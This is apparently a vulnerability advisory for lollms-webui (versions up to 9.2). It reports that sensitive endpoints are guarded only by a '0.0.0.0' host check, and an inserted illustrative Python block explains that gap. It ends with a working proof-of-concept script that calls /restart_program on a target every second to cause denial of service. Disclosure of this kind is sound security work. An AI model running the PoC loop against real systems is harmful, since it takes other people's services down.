Exposed endpoints in lollms-webui leads to denial of service
Affected versions: (,9.2]. Fixed in 9.3.
Multiple sensitive endpoints are not well protected from access by outside actors. The current protection checks whether the host parameter isn't 0.0.0.0:
if lollmsElfServer.config.host=="0.0.0.0"
However, the application may be run exposed on a specific interface, in which case this check will be insufficient.
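The gap described above, shown by comparing the quoted comparison with a stricter loopback-only rule. This is an added example, not lollms-webui code and not the project's 9.3 fix; the function names, the guard and the sample addresses are assumptions constructed for illustration.

```python
import ipaddress

def quoted_check_flags(host: str) -> bool:
    """The comparison quoted in the advisory: only the IPv4 wildcard counts as exposed."""
    return host == "0.0.0.0"

def is_loopback(addr: str) -> bool:
    """True only for 'localhost' or a loopback IP literal."""
    addr = addr.strip().lower()
    if addr == "localhost":
        return True
    try:
        return ipaddress.ip_address(addr).is_loopback
    except ValueError:
        return False  # not an IP literal: cannot prove it is local, so fail closed

def stricter_check_flags(host: str) -> bool:
    """Assumed stricter rule: any bind address that is not loopback is exposed."""
    return not is_loopback(host)

def sensitive_endpoint_allowed(bind_host: str, client_ip: str) -> bool:
    """Hypothetical guard: serve a sensitive endpoint only when the server is
    bound to loopback, or when the caller itself connects from loopback."""
    return not stricter_check_flags(bind_host) or is_loopback(client_ip)

def coverage_gap(hosts):
    """Bind addresses that are reachable from outside but pass the quoted check."""
    return [h for h in hosts if stricter_check_flags(h) and not quoted_check_flags(h)]

# Constructed sample bind addresses (not taken from the advisory).
SAMPLE_BIND_HOSTS = ["0.0.0.0", "127.0.0.1", "localhost", "192.168.1.20", "::", "::1"]

if __name__ == "__main__":
    for h in SAMPLE_BIND_HOSTS:
        print(f"{h:>14}  quoted={quoted_check_flags(h)!s:5}  stricter={stricter_check_flags(h)}")
    print("missed by the quoted check:", coverage_gap(SAMPLE_BIND_HOSTS))
```

A specific interface address and the IPv6 wildcard both pass the quoted comparison while still being reachable from other machines.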
# PoC.py
import requests
from time import sleep

IP_ADDRESS = "aaa.bbb.ccc.ddd"  # Change this to the address of the chosen interface
PORT = 9600

while True:
    try:
        response = requests.get(f"http://{IP_ADDRESS}:{str(PORT)}/restart_program")
        print(response.json())
    except Exception:
        pass
    sleep(1)
No mitigations are supplied for this issue.